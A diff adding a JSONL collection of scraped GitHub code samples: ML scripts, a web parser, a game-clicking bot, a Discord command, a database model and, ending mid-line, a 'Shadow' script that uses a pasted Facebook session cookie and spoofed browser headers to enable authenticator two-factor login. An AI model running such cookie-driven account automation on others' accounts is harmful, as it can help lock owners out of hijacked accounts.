diff --git "a/2552.jsonl" "b/2552.jsonl"
new file mode 100644
--- /dev/null
+++ "b/2552.jsonl"
@@ -0,0 +1,871 @@
+{"seq_id":"21937694093","text":"\nimport sys\nimport os\nsys.path.append('/cluster/home/rodamian/rt_prediction')\nsys.path.append('/Users/damiano/Desktop/Project_ML/rt_prediction')\n\nimport pandas as pd\nimport pickle\nfrom python.analysis.models import XGBoostModel, train_model\nimport os\nfrom python.analysis.constants import root, exp_names, data_path, exp_c, lengths\nfrom python.analysis.experiment import Experiment, MetaboliteDB, path_db\nimport glob\nimport multiprocessing as mp\ndata = pd.read_table(data_path, low_memory=False)\n\n\ndef get_cv_score(id=None, sel_feat=None, db=None, n_feat=30, n_params=50):\n\n if db is None:\n db = MetaboliteDB(path_db)\n exp = Experiment(id, db)\n\n if sel_feat is None:\n top_f = pickle.load(open(os.path.join(root, \"data\", \"sorted_feat\"), \"rb\"))\n # sel_feat_for_col = top_f.iloc[:, [exp.name in exp_c[col] for col in top_f]]\n sel_feat = top_f[\"all\"].tolist()\n\n m = XGBoostModel()\n features, rt = exp.get_features()\n cv_ratio = pd.DataFrame(columns=[exp.name], index=[\"train\", \"test\"])\n\n # Compute CV error for first n features all columns\n for i, feat in enumerate(sel_feat[0:n_feat]):\n current = sel_feat[0:(i+1)]\n\n if features.columns.isin(current).any() is False:\n current = sel_feat[0:(i + 2)]\n\n print(current)\n cv_ratio[i] = train_model(features[features.columns & current], rt.values.ravel(),\n m.parameters, m.model, n_params=n_params, n_jobs=1, ret_score=True)\n cv_ratio = cv_ratio.transpose()\n cv_ratio[\"ratio\"] = cv_ratio[\"test\"]/cv_ratio[\"train\"]\n\n # Check if directory exists otherwise create it\n if not os.path.exists(os.path.join(root, \"data\", \"cv\")):\n os.makedirs(os.path.join(root, \"data\", \"cv\"))\n\n with open(os.path.join(root, \"data\", \"cv\", \"c_\" + id), \"wb\") as f:\n pickle.dump(cv_ratio, f)\n f.close()\n\n\nif __name__ == \"__main__\":\n\n # Data cleaning\n feature_importance = pickle.load(open(os.path.join(root, \"data/feature_total\"), \"rb\"))\n feature_importance.fillna(0, inplace=True)\n feature_importance.index.rename(names=[\"features\", \"experiment\"], inplace=True)\n feature_importance.index = feature_importance.index.swaplevel()\n\n # Sum feature importance over experiment\n feature_over_exp = feature_importance.groupby(\"features\").apply(lambda x: x.abs().sum())\n\n # Sum feature importance over model\n feature_over_model = feature_over_exp.sum(axis=1)\n\n # Select top n features\n sorted_feat = pd.DataFrame(feature_over_model.sort_values(ascending=False).index.values, columns=[\"all\"])\n\n # top features for different columns\n for col in exp_c:\n\n summed_imp = feature_importance.loc[exp_c[col]].groupby(\"features\").apply(lambda x: x.abs().sum())\n feat_names = pd.DataFrame(summed_imp.sum(axis=1).sort_values(ascending=False).index.values, columns=[col])\n sorted_feat[col] = feat_names\n\n print(sorted_feat[0:20])\n\n with open(os.path.join(root, \"data\", \"sorted_feat\"), \"wb\") as f:\n pickle.dump(sorted_feat, f)\n f.close()\n\n with mp.Pool(mp.cpu_count()) as p:\n p.map(get_cv_score, exp_names)\n\n # Merging temporary databases\n with open(os.path.join(root, \"data\", \"cv_total\"), \"wb\") as c_total:\n cv_tot = pd.DataFrame()\n for f in glob.glob(os.path.join(root, \"data\", \"cv\", \"c_*\")):\n temp = pickle.load(open(f, \"rb\"))\n cv_tot = cv_tot.append(temp)\n\n pickle.dump(cv_tot, c_total)\n 
c_total.close()\n","repo_name":"rodamian/retention_time_prediction","sub_path":"compute_cv.py","file_name":"compute_cv.py","file_ext":"py","file_size_in_byte":3495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"19124548521","text":"from pymongo import MongoClient\nfrom bs4 import BeautifulSoup\nimport time\n\ndb = MongoClient('localhost', 27017).eat\nbatch_no = 201910141402\n\n\ndef main():\n docs = db[\"ori_webpageinfo\"].find({\"batch_no\": {\"$ne\": batch_no}, \"spidername\": \"ZYSJ_FangJi_Spider\"})\n for doc in docs:\n soup = BeautifulSoup(doc['data'], features=\"lxml\")\n # 原料_MSJ\n if doc['url'].endswith('useful/') and db[\"material_info\"].find_one({\"refid\": doc['_id']}) is None:\n name = soup.title.string[0:soup.title.string.find('的营养')]\n pdoc = {\"title\": soup.title.string, \"name\": name, \"url\": doc['url'], \"refid\": doc['_id'], \"creattime\": time.time(), \"parse_no\": batch_no, \"nutrition\": []}\n curtitle = ''\n for p in soup.select('.wrap .space_left p'):\n if p.strong:\n curtitle = parse_key(p.strong.text)\n elif pdoc.get(curtitle):\n pdoc[curtitle] = pdoc[curtitle]+p.text\n else:\n pdoc[curtitle] = p.text\n #成份\n for n in soup.select('.wrap .space_right .category_use_table li'):\n item = n.text.split()\n if len(item) == 3:\n pdoc[\"nutrition\"].append({\"name\": item[0], \"val\": item[1], \"unit\": item[2]})\n db[\"material_info\"].insert_one(pdoc)\n\n upd_status = {\"$set\": {\"batch_no\": batch_no, \"last_parsetime\": time.time()}}\n db[\"ori_webpageinfo\"].update(doc, upd_status)\n\n if doc['spidername'] == 'zysj_zhongyao_spider' and db[\"yaocai_info\"].find_one({\"refid\": doc['_id']}) is None:\n if soup.title and soup.title.string.find('_中药材')>=0:\n contentbox = soup.select('#content')[0];\n # name = contentbox.find(\"h1\").string\n pdoc = {\"title\": soup.title.string, \"url\": doc['url'], \"refid\": doc['_id'], \"creattime\": time.time(), \"parse_no\": batch_no, \"recodes\": []}\n curRecode = {}\n curkey = None\n for child in contentbox.children:\n if child.name == 'h1':\n pdoc[\"name\"] = child.string\n if child.name == 'h2':\n if 'refbook' in curRecode:\n pdoc['recodes'].append(curRecode)\n curRecode = {}\n if child.name == 'p':\n if 'class' in child.attrs:\n if 'drug' in child.attrs['class']:\n curkey = child.attrs['class'][1]\n child.select(\".fieldname\")[0].clear()\n if curkey == 'tp':\n pdoc['img'] = child.find(\"img\").attrs['data-popbigimg']\n else:\n curRecode[parse_zysj_key(curkey)] = child.text\n else:\n print(\"#WARNNING 异常段落 :\\n\")\n print(child)\n else:\n curRecode[parse_zysj_key(curkey)] = curRecode[parse_zysj_key(curkey)] + '\\n' + child.text\n if curRecode not in pdoc['recodes']:\n pdoc['recodes'].append(curRecode)\n\n db[\"yaocai_info\"].insert_one(pdoc)\n upd_status = {\"$set\": {\"batch_no\": batch_no, \"last_parsetime\": time.time()}}\n db[\"ori_webpageinfo\"].update(doc, upd_status)\n\n if doc['spidername'] == 'ZYSJ_FangJi_Spider' and db[\"yaofang_info\"].find_one({\"refid\": doc['_id']}) is None:\n if soup.title and soup.title.string.find('_中药方剂') >= 0:\n contentbox = soup.select('#content')[0];\n pdoc = {\"title\": soup.title.string, \"url\": doc['url'], \"refid\": doc['_id'], \"creattime\": time.time(),\n \"parse_no\": batch_no}\n curkey = None\n name = None\n for child in contentbox.children:\n if child.name == 'h1':\n name = child.string\n pdoc[\"name\"] =name\n if child.name == 'h2':\n if 'refbook' in pdoc: # 第二本,存第一本\n db[\"yaofang_info\"].insert_one(pdoc)\n pdoc = {\"title\": soup.title.string, \"url\": doc['url'], \"refid\": doc['_id'], \"creattime\": time.time(), \"parse_no\": batch_no, \"name\": name}\n if child.name == 'p':\n if 'class' in child.attrs:\n if 'drug' in child.attrs['class']:\n curkey = 
child.attrs['class'][1]\n child.select(\".fieldname\")[0].clear()\n pdoc[parse_zysj_key(curkey)] = child.text\n else:\n print(\"#WARNNING 异常段落 :\\n\")\n print(child)\n else:\n pdoc[parse_zysj_key(curkey)] = pdoc[parse_zysj_key(curkey)] + '\\n' + child.text\n #最后一本,只有一本时的第一本\n db[\"yaofang_info\"].insert_one(pdoc)\n upd_status = {\"$set\": {\"batch_no\": batch_no, \"last_parsetime\": time.time()}}\n db[\"ori_webpageinfo\"].update(doc, upd_status)\n\ndef parse_key(title):\n return {\n '食材简介': 'intro',\n '营养价值': 'nutritional',\n '食用功效': 'function',\n '适用人群': 'fit_for',\n '禁忌人群': 'avoid_for',\n '选购技巧': 'how_buy',\n '存储简述': 'store',\n '其它相关说明': 'appendix'\n }.get(title, title)\ndef parse_zysj_key(ky):\n return {\n 'py': 'pinyin',\n 'ywm': 'enname',\n 'bm': 'alias',\n 'cc': 'ref',\n 'ly': 'birth',\n 'yxt': 'model',\n 'sjfb': 'place',\n 'xz': 'character',\n 'gnzz': 'function',\n 'yfyl': 'usemethod',\n 'gjls': 'appendix',\n 'zl': 'refbook',\n 'xw': 'xinwei',\n 'ff': 'usewith',\n 'zy': 'attention',\n 'hxcf': 'chemial',\n 'dx': 'by-effect',\n 'jb': 'recognize',\n 'pz': 'produce',\n 'gj': 'guijin',\n 'zc': 'store',\n 'lcyy': 'applyfor',\n 'bz': 'memo',\n 'cf': 'construction',\n 'zf': 'produce'\n }.get(ky, ky)\nif __name__ == \"__main__\":\n # execute only if run as a script\n main()\n\n","repo_name":"amwanfwbx/cn-medicine","sub_path":"data/py/eatspiders/webpageparser.py","file_name":"webpageparser.py","file_ext":"py","file_size_in_byte":6585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"24723490307","text":"import pyautogui\r\nimport time\r\n\r\n\r\nif __name__ == \"__main__\":\r\n #screenWidth, screenHeight = pyautogui.size() \r\n #print(\"scrwidth:{}-scrheight:{}\".format(screenWidth, screenHeight))\r\n\r\n ############################### way 1 to move and click ################\r\n pyautogui.moveTo(280, 750) \r\n pyautogui.click() \r\n time.sleep(2)\r\n\r\n\r\n ####################### 2 ####################################\r\n def ball_check():\r\n im = pyautogui.screenshot()\r\n #for i in range(320, 600, 5):\r\n #r, g, b = im.getpixel((425, i))\r\n #if r == g == b == 255:\r\n #return True\r\n #r, g, b = im.getpixel((430, i+10))\r\n #r2, g2, b2 = im.getpixel((425, i))\r\n #if (r2 > 250) & (g2 > 250) & (b2 > 250) & (b > 100)\r\n #return True\r\n #return False\r\n for i in range(420, 435):\r\n \tif (im.getpixel((i, 609)) == (114, 136, 5)):\r\n \t\treturn True\r\n return False\r\n\r\n############3\r\n while(1):\r\n if(ball_check()):\r\n pyautogui.press('space')\r\n time.sleep(.05)\r\n \r\n \r\n\r\n\r\n ","repo_name":"amirkasra007/Telegram_Games","sub_path":"football_star_auto.py","file_name":"football_star_auto.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"38109928302","text":"# Define your api key as an environment variable\nimport os \n\n\nos.environ['WORDS_API_KEY'] = 'your_api_key'\n# ----------------------------------------------\n# Or use the Dictionary class\nfrom wordsapy import Dictionary\n\n\ndictionary = Dictionary(api_key='your_api_key')\n# or\ndictionary = Dictionary()\ndictionary.api_key = 'your_api_key'\n# ----------------------------------------------\n# Or the WordsapyClient class\nfrom wordsapy import WordsapyClient\n\n\nclient = WordsapyClient(api_key='your_api_key')\n# or\nclient = WordsapyClient()\nclient.api_key = 'your_api_key'\n# ----------------------------------------------\n# when using any of these classes the api key \n# will be defined as an environment variable, \n# so with doing it only once is more than enough","repo_name":"BackrndSource/wordsapy","sub_path":"examples/api_key.py","file_name":"api_key.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"43480954526","text":"''''\r\nThe svd method is a way to convert an (m x n) rectangular matrix to \r\nan equivalent form that is almost a diagonal form\r\n to Achieve this we use the tasformation\r\n\r\n S = U^T.A.V, where U and V are (m x m) and (n x n) orthogonal \r\n matrices respectively.\r\n If we choose the matrix A^T.A , we'll find it to be symmetric and can be \r\n eigen value decomposed using any standard method where \r\n A^T.A will be diagonalized by V, while similarly A.A^T will be\r\n diagonalized U.\r\n '''\r\nimport numpy as np\r\nimport numpy.linalg as l\r\nimport timeit as t\r\n\r\nA = np.array([[0,1,1],[0,1,0],[1,1,0],[0,1,0],[1,0,1]],dtype = np.float64)\r\nATA = np.dot(np.transpose(A),A)\r\nAAT = np.dot(A,np.transpose(A))\r\n\r\ndef check_diagonal(D):\r\n\terror_threshold = 1.0e-8\r\n\tfor i in range(D.shape[0]):\r\n\t\tfor j in range(D.shape[1]):\r\n\t\t\tif(i!=j):\r\n\t\t\t\tif(abs(D[i,j])>=error_threshold): \r\n\t\t\t\t\treturn False\r\n\t\t\telse:\t\r\n\t\t\t\tcontinue\r\n\treturn True\r\n\r\n'''\r\nTransformer Finds the corresponding Diagonalizing matrices by QR itteration.\r\n'''\r\ndef transformer(D):\r\n\tS = np.identity(D.shape[0],dtype = np.float64)\r\n\twhile(check_diagonal(D) == False):\r\n\t\tQ = l.qr(D)[0]\r\n\t\tS = np.dot(S,Q)\r\n\t\tD = np.dot(np.transpose(Q),np.dot(D,Q))\r\n\treturn S\r\n\r\nV = transformer(ATA)\r\nU = transformer(AAT)\r\n#We obtain SVD by direct transformation formula\r\nS = np.dot(np.transpose(U),np.dot(A,V))\r\nfor i in range(S.shape[0]):\r\n\tfor j in range(S.shape[1]):\r\n\t\tif(abs(S[i,j])<=1.0e-6):\r\n\t\t\tS[i,j] = 0.0\r\nprint(\"SVD Matrix by direct computation:\\n\",S,\"\\n\")\r\nprint(\"Time Taken = \",t.timeit(),\"\\n\")\r\nprint(\"SVD Diagonal elements by function:\\n\",l.svd(A)[1],\"\\n\")\r\nprint(\"Time Taken = \",t.timeit())\r\n\r\n'''\r\nThe SVD Values obtained via direct theoretical calculation and using \r\npackage differ due to the fact that the SVD values are square roots of the\r\neigenvalues of A^T.A or A.A^T, so there is a particular freedom to choose\r\nthe particular sign.\r\n\r\nSince we used the method to find the transformer so it might yield a negative,\r\nThe functional Module uses the method to find Eigen Values and by convention made positive. \r\n'''","repo_name":"RounakChatterjee/SEM2_AssignmentI","sub_path":"svd_decomp.py","file_name":"svd_decomp.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"74153617153","text":"import copy\nimport functools\nimport random\n\nimport yaml\n\nfrom tf_pwa.amp import (\n DecayChain,\n DecayGroup,\n get_decay,\n get_particle,\n split_particle_type,\n)\n\nfrom .base_config import BaseConfig\n\n\ndef set_min_max(dic, name, name_min, name_max):\n if name not in dic and name_min in dic and name_max in dic:\n dic[name] = (\n random.random() * (dic[name_max] - dic[name_min]) + dic[name_min]\n )\n\n\nclass DecayConfig(BaseConfig):\n def __init__(self, dic, share_dict={}):\n self.config = dic\n self.share_dict = share_dict\n self.particle_key_map = {\n \"Par\": \"P\",\n \"m0\": \"mass\",\n \"g0\": \"width\",\n \"J\": \"J\",\n \"P\": \"P\",\n \"spins\": \"spins\",\n \"bw\": \"model\",\n \"model\": \"model\",\n \"bw_l\": \"bw_l\",\n \"running_width\": \"running_width\",\n }\n self.decay_key_map = {\"model\": \"model\"}\n self.dec = self.decay_item(self.config[\"decay\"])\n (\n self.particle_map,\n self.particle_property,\n self.top,\n self.finals,\n ) = self.particle_item(self.config[\"particle\"], share_dict)\n self.full_decay = DecayGroup(\n self.get_decay_struct(\n self.dec,\n self.particle_map,\n self.particle_property,\n self.top,\n self.finals,\n )\n )\n self.decay_struct = DecayGroup(self.get_decay_struct(self.dec))\n\n @staticmethod\n def load_config(file_name, share_dict={}):\n if isinstance(file_name, dict):\n return copy.deepcopy(file_name)\n if isinstance(file_name, str):\n if file_name in share_dict:\n return DecayConfig.load_config(share_dict[file_name])\n with open(file_name) as f:\n ret = yaml.safe_load(f)\n if ret is None:\n ret = {}\n return ret\n raise TypeError(\"not support config {}\".format(type(file_name)))\n\n def get_decay(self, full=True):\n if full:\n return self.full_decay\n else:\n return self.decay_struct\n\n @staticmethod\n def _list2decay(core, outs):\n parts = []\n params = {}\n for j in outs:\n if isinstance(j, dict):\n for k, v in j.items():\n params[k] = v\n else:\n parts.append(j)\n dec = {\"core\": core, \"outs\": parts, \"params\": params}\n return dec\n\n @staticmethod\n def decay_item(decay_dict):\n decs = []\n for core, outs in decay_dict.items():\n is_list = [isinstance(i, list) for i in outs]\n if all(is_list):\n for i in outs:\n dec = DecayConfig._list2decay(core, i)\n decs.append(dec)\n else:\n dec = DecayConfig._list2decay(core, outs)\n decs.append(dec)\n return decs\n\n @staticmethod\n def _do_include_dict(d, o, share_dict={}):\n s = DecayConfig.load_config(o, share_dict)\n for i in s:\n if i in d:\n if isinstance(d[i], dict):\n s[i].update(d[i])\n d[i] = s[i]\n else:\n d[i] = s[i]\n\n @staticmethod\n def particle_item_list(particle_list):\n particle_map = {}\n particle_property = {}\n for particle, candidate in particle_list.items():\n if isinstance(candidate, list): # particle map\n if len(candidate) == 0:\n particle_map[particle] = []\n for i in candidate:\n if isinstance(i, str):\n particle_map[particle] = particle_map.get(\n particle, []\n ) + [i]\n elif isinstance(i, dict):\n map_i, pro_i = DecayConfig.particle_item_list(i)\n for k, v in map_i.items():\n particle_map[k] = particle_map.get(k, []) + v\n particle_property.update(pro_i)\n else:\n raise ValueError(\n \"value of particle map {} is {}\".format(i, type(i))\n )\n elif isinstance(candidate, dict):\n particle_property[particle] = candidate\n else:\n raise ValueError(\n \"value of particle {} is {}\".format(\n particle, type(candidate)\n )\n )\n return particle_map, particle_property\n\n @staticmethod\n def particle_item(particle_list, 
share_dict={}):\n top = particle_list.pop(\"$top\", None)\n finals = particle_list.pop(\"$finals\", None)\n includes = particle_list.pop(\"$include\", None)\n if includes:\n if isinstance(includes, list):\n for i in includes:\n DecayConfig._do_include_dict(\n particle_list, i, share_dict=share_dict\n )\n elif isinstance(includes, str):\n DecayConfig._do_include_dict(\n particle_list, includes, share_dict=share_dict\n )\n else:\n raise ValueError(\n \"$include must be string or list of string not {}\".format(\n type(includes)\n )\n )\n particle_map, particle_property = DecayConfig.particle_item_list(\n particle_list\n )\n\n if isinstance(top, dict):\n particle_property.update(top)\n if isinstance(finals, dict):\n particle_property.update(finals)\n return particle_map, particle_property, top, finals\n\n def rename_params(self, params, is_particle=True):\n ret = {}\n if is_particle:\n key_map = self.particle_key_map\n else:\n key_map = self.decay_key_map\n for k, v in params.items():\n ret[key_map.get(k, k)] = v\n return ret\n\n def get_decay_struct(\n self,\n decay,\n particle_map=None,\n particle_params=None,\n top=None,\n finals=None,\n ):\n \"\"\" get decay structure for decay dict\"\"\"\n particle_map = particle_map if particle_map is not None else {}\n particle_params = (\n particle_params if particle_params is not None else {}\n )\n\n particle_set = {}\n\n def add_particle(name):\n if name in particle_set:\n return particle_set[name]\n params = particle_params.get(name, {})\n params = self.rename_params(params)\n set_min_max(params, \"mass\", \"m_min\", \"m_max\")\n set_min_max(params, \"width\", \"g_min\", \"g_max\")\n part = get_particle(name, **params)\n particle_set[name] = part\n return part\n\n def wrap_particle(name):\n name_list = particle_map.get(name, [name])\n return [add_particle(i) for i in name_list]\n\n def all_combine(out):\n if len(out) < 1:\n yield []\n else:\n for i in out[0]:\n for j in all_combine(out[1:]):\n yield [i] + j\n\n decs = []\n for dec in decay:\n core = wrap_particle(dec[\"core\"])\n outs = [wrap_particle(j) for j in dec[\"outs\"]]\n for i in core:\n for j in all_combine(outs):\n dec_i = get_decay(i, j, **dec[\"params\"])\n decs.append(dec_i)\n\n top_tmp, finals_tmp = set(), set()\n if top is None or finals is None:\n top_tmp, res, finals_tmp = split_particle_type(decs)\n if top is None:\n top_tmp = list(top_tmp)\n assert len(top_tmp) == 1, \"not only one top particle\"\n top = list(top_tmp)[0]\n else:\n if isinstance(top, str):\n top = particle_set[top]\n elif isinstance(top, dict):\n keys = list(top.keys())\n assert len(keys) == 1\n top = particle_set[keys.pop()]\n else:\n return particle_set[str(top)]\n if finals is None:\n finals = list(finals_tmp)\n elif isinstance(finals, (list, dict)):\n finals = [particle_set[i] for i in finals]\n else:\n raise TypeError(\"{}: {}\".format(finals, type(finals)))\n\n dec_chain = top.chain_decay()\n ret = []\n for i in dec_chain:\n if sorted(DecayChain(i).outs) == sorted(finals):\n ret.append(i)\n return ret\n","repo_name":"zhaoruoping/tf_pwa","sub_path":"tf_pwa/config_loader/decay_config.py","file_name":"decay_config.py","file_ext":"py","file_size_in_byte":8776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23577991531","text":"\t\n\n# Import the file as a list of lines:\n\n# def sortString(stringArr):\t\n# \toutput=[];\n# \treturn output;\n\n\n\nfile_in = 'in.txt'\nfile_out = 'out.txt'\n\nwith open(file_in,'rb') as fin, open(file_out,'wb') as fout:\n\t\n\tlines = fin.read().splitlines()\n\tcase = 1\n\tcases=int(lines[0])\n\tlines=lines[1:]\n\tindex=0;\n\n\tfor i in range(cases):\n\t\tcase = i+1\n\t\trC=lines[index].split();\n\n\t\td=int(rC[0]);\n\t\tn=int(rC[1]);\n\t\tindex=index+1;\n\t\tt1=0;\n\t\tfor j in range(n):\n\t\t\tps=lines[index].split();\n\t\t\tp=int(ps[0]);\n\t\t\ts=int(ps[1]);\n\n\t\t\ttempT=(d-p)/float(s);\n\t\t\tt1=max(t1,tempT);\n\t\t\tindex=index+1;\n\t\tspeed=d/t1;\n\n\t\tspeed='{0:.6f}'.format(speed)\n\t\t\n\t\toutput = 'Case #%d: %s\\n' % (case,speed)\n\t\t\n\t\t# output=str(r);\n\t\t# fout.write(output)\n\t\t# index=index+n; \n\n\t\t\n\n\n\t\tfout.write(output)\n\t\t\n\t\t\n\n\t# print (lines)\n\n\t\t\n\n\n\n\n\n\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_206/1068.py","file_name":"1068.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"40162847527","text":"from discord.ext import commands\nimport discord\nimport main as m\n\nconfig = m.readConfig()\n\n\n@commands.command(\n name=\"ip\",\n alias=['ips', 'server', 'servers'],\n description=\"Returns the IPs of Ebrius' Servers\",\n usage=\"\"\n)\nasync def ip(ctx):\n ipEmbed = discord.Embed(\n title=\"Server IPs\",\n color=discord.Color.green\n )\n\n ipEmbed.add_field(\n name=\"Survival\",\n value=config['survivalIP'],\n inline=False)\n ipEmbed.add_field(\n name=\"Creative\",\n value=config['creativeIP'],\n inline=False)\n ipEmbed.add_field(\n name=\"Events\",\n value=config['eventsIP'],\n inline=False)\n\n await ctx.send(embed=ipEmbed)\n\n\ndef setup(bot):\n bot.add_command(ip)\n","repo_name":"Sadeeed/discordbot","sub_path":"plugins/ip.py","file_name":"ip.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"40283755024","text":"from dataclasses import dataclass\n\nfrom ..services.database import Database\n\n\n@dataclass\nclass InstructorInfoParameter(object):\n \"\"\"\n Auxiliary class to handle the high amount of class parameters.\n \"\"\"\n instructor_id: str\n instructor_name: str\n department_id: str\n\n\nclass InstructorInfo(Database.get_db().Model):\n __tablename__ = \"UniversityServiceInstructorInfo\"\n InstructorID = Database.get_db().Column(\n Database.get_db().Integer(),\n autoincrement=True,\n nullable=False,\n primary_key=True\n )\n InstructorName = Database.get_db().Column(\n Database.get_db().String(255),\n nullable=False\n )\n DepartmentID = Database.get_db().Column(\n Database.get_db().String(255),\n nullable=False\n )\n __table_args__ = (\n Database.get_db().Index('UniversityServiceInstructorInfoIndex', InstructorID, DepartmentID),\n )\n\n def __init__(self, instructor_name, department_id):\n self.InstructorName = instructor_name\n self.DepartmentID = department_id\n\n @staticmethod\n def save(instructor_name, department_id):\n instructor_info = InstructorInfo(instructor_name, department_id)\n instructor_info._create()\n return instructor_info\n\n def _create(self):\n try:\n with Database.session_manager() as session:\n session.add(self)\n except Exception:\n print(f\"[DB] Failed to create in: {self.__tablename__}\")\n\n @staticmethod\n def delete_all():\n \"\"\"\n https://docs.sqlalchemy.org/en/14/orm/session_basics.html#orm-expression-update-delete\n :return:\n \"\"\"\n\n try:\n with Database.session_manager() as session:\n session.query(InstructorInfo).delete()\n except Exception:\n print(f\"[DB] Failed to clear Instructor information from table\")\n\n @staticmethod\n def init_app():\n print(\"[DB] Instructor Info Table initialisation done\")\n","repo_name":"rera5078/studyBuff","sub_path":"universityService/src/externalServices/database/tables/universityServiceInstructorInfo.py","file_name":"universityServiceInstructorInfo.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"20198054828","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\n\r\nCopyright (c) 2022 Abid Hussain\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy\r\nof this software and associated documentation files (the \"Software\"), to deal\r\nin the Software without restriction, including without limitation the rights\r\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\r\ncopies of the Software, and to permit persons to whom the Software is\r\nfurnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all\r\ncopies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\nSOFTWARE.\r\n\r\n\"\"\"\r\n\r\nimport requests as req, re\r\nfrom bs4 import BeautifulSoup as par\r\nimport rich as rich\r\n\r\n__import__('os').system('git pull')\r\n\r\nheaders = {\r\n\t\"Host\":\"mbasic.facebook.com\",\r\n\t\"accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\r\n\t\"accept-language\":\"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7\",\r\n\t\"origin\":\"https://www.facebook.com\",\r\n\t\"referer\":\"https://www.facebook.com\",\r\n\t\"sec-ch-ua\":'\";Not A Brand\";v=\"99\", \"Chromium\";v=\"94\"',\r\n\t\"upgrade-insecure-requests\":\"1\",\r\n\t\"user-agent\":\"Mozilla/5.0 (Mobile; rv:48.0; A405DL) Gecko/48.0 Firefox/48.0 KAIOS/2.5\"\r\n}\r\n\r\nses = req.Session()\r\nses.headers.update(headers)\r\n\r\nclass Main(object):\r\n\t\r\n\tdef __init__(self,coki):\r\n\t\tself.coki = {\"cookie\":coki}\r\n\tdef logo(self):\r\n\t\tlogo = \"\"\"\r\n\r\n _____ _ _ \r\n/ ___| | | | \r\n\\ `--.| |__ __ _ __| | _____ __\r\n `--. \\ '_ \\ / _` |/ _` |/ _ \\ \\ /\\ / /\r\n/\\__/ / | | | (_| | (_| | (_) \\ V V / \r\n\\____/|_| |_|\\__,_|\\__,_|\\___/ \\_/\\_/ \r\n \r\n Tools enable a2f Facebook, \\x1b[0;92mv1.0.0\\x1b[0;97m\r\n\tDeveloper: SHADOW HACKER, Team: BLACK_HAT\r\n\t\t\"\"\"\r\n\t\treturn logo\r\n\tdef cek(self):\r\n\t\ttry:\r\n\t\t\tr = par(\r\n\t\t\t\tses.get(\r\n\t\t\t\t\t\"https://mbasic.facebook.com/security/2fac/setup/intro/metadata/?source=1\",cookies=self.coki\r\n\t\t\t\t).text, 'html.parser'\r\n\t\t\t)\r\n\t\texcept req.exceptions.TooManyRedirects:\r\n\t\t\tr = par(\r\n\t\t\t\treq.get(\r\n\t\t\t\t\t\"https://mbasic.facebook.com/security/2fac/setup/intro/metadata/?source=1\",cookies=self.coki\r\n\t\t\t\t).text, 'html.parser'\r\n\t\t\t)\r\n\t\ttry:\r\n\t\t\tlanjut = r.find(\r\n\t\t\t\t\"a\",string=\"Use Authentication App\"\r\n\t\t\t).get(\r\n\t\t\t\t\"href\"\r\n\t\t\t)\r\n\t\texcept:\r\n\t\t\texit(\" ! 
your account is already installed a2f ×\")\r\n\t\ttry:\r\n\t\t\t__r = ses.get(lanjut,cookies=self.coki).text\r\n\t\texcept req.exceptions.TooManyRedirects:\r\n\t\t\t__r = req.get(lanjut,cookies=self.coki).text\r\n\t\tco = par(__r, 'html.parser')\r\n\t\ttry:\r\n\t\t\tkode = self.get_kode(co)\r\n\t\t\tprint(\"\\n * Key authen:\",kode,\"\\n * Enter the authentic key in the authentic app 2 faktor!\\n\")\r\n\t\texcept:\r\n\t\t\tif \"For security, please re-enter your password to continue.\" in __r:\r\n\t\t\t\tprint(\" * For security, please enter your Facebook password to continue.\")\r\n\t\t\t\tsandi = input(\" + Password facebook: \")\r\n\t\t\t\tlanjut = co.find(\r\n\t\t\t\t\t'form',{\r\n\t\t\t\t\t\t'method':'post'\r\n\t\t\t\t\t}\r\n\t\t\t\t)\r\n\t\t\t\tmemek = {}\r\n\t\t\t\tlst = [\"fb_dtsg\",\"jazoest\",\"save\"]\r\n\t\t\t\tfor x in lanjut:\r\n\t\t\t\t\tif x.get(\"name\") in 